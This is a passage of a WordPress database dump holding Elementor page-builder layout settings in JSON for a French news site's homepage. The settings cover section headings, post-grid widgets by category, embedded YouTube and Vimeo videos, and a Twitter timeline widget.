fffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2379,764,'_elementor_version','0.4'),(2381,765,'_elementor_edit_mode','builder'),(2382,765,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\